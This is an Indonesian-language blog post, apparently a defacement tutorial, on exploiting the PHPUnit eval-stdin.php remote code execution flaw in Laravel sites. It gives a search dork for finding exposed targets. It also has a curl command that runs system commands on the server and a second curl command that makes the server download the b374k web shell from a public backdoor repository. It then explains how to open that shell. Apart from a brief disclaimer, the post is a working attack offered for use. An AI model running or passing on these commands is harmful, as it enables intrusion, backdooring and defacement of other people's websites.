Deface poc laravel php unit RCE

Hello..
Di sini saya mau membagikan cara deface poc laravel php unit RCE
oh ya disclaimer " Gunakan dengan bijak dan jangan merusaknya tutorial ini hanya sekedar memberikan wawasan semata "

Langsung saja 


Dork nya:
index of vendor/phpunit

Exploit:
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

disini saya menggunakan curl untuk command di bawah

command untuk melihat server web nya:

curl -v -X GET --data "<?php system('uname -a'); ?>" 127.0.0.1/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

command untuk upload shell nya:

curl -v -X GET --data "<?php system('wget https://raw.githubusercontent.com/backdoorhub/shell-backdoor-list/master/shell/php/b374k.php');" 127.0.0.1/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

untuk shell nya bisa kalian rubah sendiri hehe,,oh iya ciri²web vuln yaitu blank,terdownload dll kalian coba aja :D

oke langkah pertama kita jalan kan command untuk melihat server nya,jika tidak mau kalian bisa langsung upload shell

,jika kalian saat mengecek server nya menggunakan command diatas tetapi tidak keluar nama server nya berarti web kalian tidak vuln,oke marikita coba upload shell kita




shell sudah terupload sukses dan untuk cara mengaksesnya gimana ?

127.0.01/vendor/phpunit/phpunit/src/Util/PHP/b374k.php



cukup sekian dan terima kasih 

source : www.pandaantech.com/repository/


By at

~ ~

No comments:

Post a Comment